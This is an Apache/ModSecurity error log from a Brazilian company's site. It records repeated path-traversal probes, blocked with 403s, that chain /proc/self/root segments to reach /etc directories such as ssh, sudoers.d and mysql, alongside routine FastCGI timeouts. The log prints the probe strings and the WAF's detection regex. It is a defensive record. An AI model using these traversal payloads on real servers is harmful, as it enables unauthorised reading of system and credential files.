[Tue Mar 17 18:44:26.179774 2026] [:error] [pid 25836:tid 140411666392832] [client 74.7.241.31:51072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLOoh-PF_25v4hFRCFhwAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:44:39.071493 2026] [proxy_fcgi:error] [pid 25836:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55416] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:44:40.934632 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:39750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLSNY0UrI5A3LftIwZdQAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:44:43.088472 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:39750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLS9Y0UrI5A3LftIwZeQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:44:57.595560 2026] [:error] [pid 7004:tid 140411708356352] [client 74.7.243.128:35296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLWcU6Sx0TG1YjmQjJmgAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:45:00.129792 2026] [proxy_fcgi:error] [pid 7437:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55958] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:45:21.143323 2026] [proxy_fcgi:error] [pid 29151:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56516] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:45:43.174633 2026] [proxy_fcgi:error] [pid 7004:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57010] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:45:47.871454 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.243.128:60056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLi4h-PF_25v4hFRCFrgAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:46:05.057804 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57580] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:46:08.934567 2026] [:error] [pid 2598:tid 140411666392832] [client 74.7.243.128:35516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLoBj0p0SRWAqcjGGVFAAAAwk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:46:28.127044 2026] [proxy_fcgi:error] [pid 2598:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58106] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:46:29.895299 2026] [:error] [pid 29151:tid 140411716749056] [client 74.7.241.31:59840] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnLtfPqhzTj3BvfDX-imAAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:46:50.132135 2026] [proxy_fcgi:error] [pid 7437:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58646] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:47:13.129822 2026] [proxy_fcgi:error] [pid 7437:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59202] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:47:14.270764 2026] [:error] [pid 25836:tid 140411716749056] [client 74.7.241.31:51234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnL4oh-PF_25v4hFRCF3QAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:47:21.660199 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.241.31:51234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnL6Yh-PF_25v4hFRCF5AAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:47:36.145901 2026] [proxy_fcgi:error] [pid 25836:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59788] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:47:38.038554 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:34100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnL-tY0UrI5A3LftIwZ_wAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:47:58.125859 2026] [proxy_fcgi:error] [pid 2473:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60348] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:48:06.761196 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.243.128:46378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMFqBJNF7axNlVR0U0CAAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:48:17.516094 2026] [:error] [pid 7004:tid 140411624429312] [client 74.7.241.31:47820] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMIcU6Sx0TG1YjmQjKEwAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:48:21.139317 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60950] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:48:23.455789 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:44502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMJ-yqAr6etmhZHNpDWgAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:48:43.529788 2026] [proxy_fcgi:error] [pid 2598:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33248] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:48:47.125552 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:46440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMPuyqAr6etmhZHNpDbwAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:49:00.702593 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.243.128:55118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMTAeiSKl8TjouI-YzdQAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:49:06.125785 2026] [proxy_fcgi:error] [pid 7437:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:33854] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:49:21.475159 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.243.128:38730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMYQeiSKl8TjouI-YzgwAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:49:28.121768 2026] [proxy_fcgi:error] [pid 19507:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34374] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:49:50.130404 2026] [proxy_fcgi:error] [pid 2473:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:34918] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:50:09.271308 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.241.31:60766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMkfPqhzTj3BvfDX-jGwAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:50:11.134799 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:42926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMkxj0p0SRWAqcjGGVfwAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:50:12.057845 2026] [proxy_fcgi:error] [pid 7437:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35536] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:50:17.842358 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.243.128:48488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMmaBJNF7axNlVR0U0XAAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:50:34.133886 2026] [proxy_fcgi:error] [pid 6296:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36094] AH01075: Error dispatching request to : (polling)
